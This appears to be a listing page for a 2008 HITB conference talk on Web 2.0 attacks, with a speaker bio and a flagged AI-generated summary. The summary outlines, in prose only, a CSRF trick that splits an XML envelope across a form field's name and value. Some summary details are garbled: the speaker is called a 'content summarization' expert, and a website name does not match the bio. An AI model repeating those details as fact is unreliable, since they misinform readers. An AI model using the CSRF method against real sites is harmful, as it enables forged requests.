Hackers of India

Top 10 Web 2.0 Attacks

By  Shreeraj Shah  on 29 Oct 2008 @ Hitb Sec Conf

Presentation Material

Abstract

Shreeraj Shah, B.E., MSCS, MBA, is the founder of Blueinfy, a company that provides application security services. Prior to founding Blueinfy, he was founder and board member at Net Square. He also worked with Foundstone (McAfee), Chase Manhattan Bank and IBM in security space. He has performed several security consulting assignments in the area of penetration testing, code reviews, web application assessments and security architecture reviews.

He is also the author of popular books like Hacking Web Services (Thomson 06) and Web Hacking: Attacks and Defense (Addison-Wesley 03). In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, ISACA etc. His articles are regularly published on Securityfocus, InformIT, DevX, O’reilly, HNS. His work has been quoted on BBC, Dark Reading, Bank Technology as an expert.

AI Generated Summarymay contain errors

Here is a summarized version of the content:

Identity and Purpose

The speaker is an expert in content summarization, CTF (Capture The Flag) and discusses web application security, specifically focusing on XML-based CSRF attacks.

Main Points

  1. iFrame restrictions: Each iframe has its own DOM,, which cannot be accessed from another iframe.
  2. Widget, gadget, and module architecture: When analyzing these components, checks are made to identify potential vulnerabilities.
  3. Countermeasures and security scanning: Codebase analysis, linkage method signature identification, and content filtering are essential for 2.0 applications.
  4. XML-based CSRF attacks: The speaker explains how to bypass same-origin policy using XML envelopes and demonstrates an example of a one-way CSRF attack.

Q&A

A question is asked about the same-origin policy not kicking in during an XML-based CSRF attack. The speaker clarifies that this can be achieved by creating a form with input type headers, injecting part of the XML envelope into the name field, and using the rest of the envelope as the value. This allows the creation of a legitimate-looking XML envelope, which can bypass security checks.

Conclusion

The speaker provides their email address and invites attendees to download tools from their website (blueantfeed.com).